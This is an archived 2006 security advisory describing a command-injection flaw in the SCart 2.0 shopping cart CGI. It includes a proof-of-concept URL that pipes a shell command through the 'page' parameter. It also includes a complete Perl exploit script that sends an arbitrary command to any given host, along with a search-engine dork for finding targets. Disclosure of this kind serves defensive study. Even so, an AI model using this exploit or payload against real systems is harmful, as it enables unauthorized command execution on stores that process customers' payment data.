Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: e-commerce, shopping carts :: b06-2683.htm

SCart 2.0 Remote Code Execution



SCart 2.0 Remote Code Execution
SCart 2.0 Remote Code Execution



____________________   ___ ___ ________=0D
\_   _____/\_   ___ \ /   |   \\_____  \  =0D
 |    __)_ /    \  \//    ~    \/   |   \ =0D
 |        \\     \___\    Y    /    |    \=0D
/_______  / \______  /\___|_  /\_______  /=0D
        \/         \/       \/         \/ =0D
=0D
					.OR.ID=0D
ECHO_ADV_32$2006=0D
=0D
---------------------------------------------------------------------------=0D
[ECHO_ADV_32$2006] SCart 2.0 Remote Code Execution=0D
---------------------------------------------------------------------------=0D
=0D
Author       : M.Hasran Addahroni a.k.a K-159=0D
Date         : June, 3th 2006=0D
Location     : Indonesia, Bali=0D
Web : http://advisories.echo.or.id/adv/adv32-K-159-2006.txt=0D 
Critical Lvl : Highly critical=0D
Impact       : System access=0D
Where        : From Remote=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
SCart =0D
=0D
Application : SCart =0D
version     : 2.0=0D
URL : http://www.scartserver.com=0D 
Description :=0D
=0D
SCart is a free shopping cart online store service with e-commerce and real-time credit card and check payment processing service.=0D
=0D
---------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~~~~=0D
In scart.cgi we have source code like this=0D
=0D
-----------------------scart.cgi-----------------------------=0D
...=0D
require 'scart.pl';=0D
require '/home/scart/cgi-bin/2.0/scartserver.cgi';=0D
...=0D
--------------------------------------------------------------=0D
=0D
then at scartserver.cgi in cgi-bin folder the code like this=0D
=0D
---------------scartserver.cgi--------------------------------=0D
...=0D
$HTML{TAB2} = "$baseurl$cgiurl/?action=show_page&base=base2.html&page=browse.txt";=0D
$HTML{TAB3} = "$baseurl$cgiurl/?action=show_page&base=base3.html&page=specials.txt";=0D
$HTML{BUTTONBAR} = $buttonbar;=0D
$HTML{VIEWCART} = "$baseurl$cgiurl?action=viewcart";=0D
$HTML{CHECKOUT} = "$secureurl$cgiurl?action=checkout";=0D
$HTML{TRACK} = "$baseurl$cgiurl?action=show_track";=0D
$HTML{HELP} = "$baseurl$cgiurl/?action=show_page&base=base.html&page=help.txt";=0D
...=0D
------------------------------------------------------------------=0D
=0D
Variables $baseurl and $cgiurl are not properly sanitized.This can be used to execute arbitrary commands.=0D
=0D
Proof Of Concept:=0D
~~~~~~~~~~~~~~~~~=0D
=0D
http://www.scartserver.com/2.0/[client_user_name]/scart.cgi/?action=show_page&base=base2.html&page=|id|=0D 
=0D
Solution:=0D
~~~~~~~~~=0D
=0D
no solution yet=0D
=0D
Notification:=0D
~~~~~~~~~~~~=0D
=0D
 vendor was contact but no response.=0D
=0D
---------------------------------------------------------------------------=0D
Shoutz:=0D
~~~~~~~=0D
~ ping - my dearest wife, for all the luv the tears n the breath =0D
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten=0D
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw=0D
~ sinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit=0D
~ newbie_hacker@yahoogroups.com =0D 
~ #aikmel #e-c-h-o @irc.dal.net=0D 
---------------------------------------------------------------------------=0D
Contact:=0D
~~~~~~~~=0D
=0D
     K-159 || echo|staff || eufrato[at]gmail[dot]com=0D
Homepage: http://k-159.echo.or.id/=0D 
=0D
-------------------------------- [ EOF ] ----------------------------------=0D
=0D
Perl Exploit:=0D
~~~~~~~~~~~~=0D
=0D
#!/usr/bin/perl=0D
##=0D
#     SCart 2.0 Remote Code Execution Exploit=0D
#          Bugs Found & code By K-159=0D
#               =0D
## base on advisory at http://advisories.echo.or.id/adv/adv32-K-159-2006.txt=0D 
#   =0D
#  echo.or.id (c) 2006=0D
#=0D
##=0D
# usage:=0D
# perl scart.pl   "cmd"=0D
#=0D
# Google Dork : site:scartserver.com=0D
#=0D
# Greetz: my soul mate,echo|staff,aikmel|crew,masterpop3,SinChan,rizal,etc=0D
#=0D
# Contact: eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net=0D 
#=0D
use IO::Socket;=0D
use LWP::Simple;=0D
=0D
sub Usage {=0D
print STDERR "\n ========================================================= \r\n";=0D
print STDERR "      *SCart 2.0 Remote Code Execution Exploit* \r\n";=0D
print STDERR "                Bugs Found by K-159 \r\n";=0D
print STDERR " www.echo.or.id #e-c-h-o irc.dal.net \r\n";=0D 
print STDERR " Usage: $0   \"cmd\" \r\n";=0D 
print STDERR "============================================================= \r\n";=0D
exit;=0D
}=0D
=0D
if (@ARGV < 3)=0D
{=0D
 Usage();=0D
}=0D
=0D
=0D
$host = @ARGV[0];=0D
$path = @ARGV[1];=0D
$command = @ARGV[2];=0D
=0D
print "\n[+] Conecting to $host\n";=0D
=0D
my $result = get("http://$host$path/scart.cgi?action=show_page&base=base2.html&page=browse.txt|$command|");=0D 
=0D
if (defined $result) {=0D
print $result;=0D
}=0D
else {=0D
print "Exploit Failed.\n";=0D
}=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH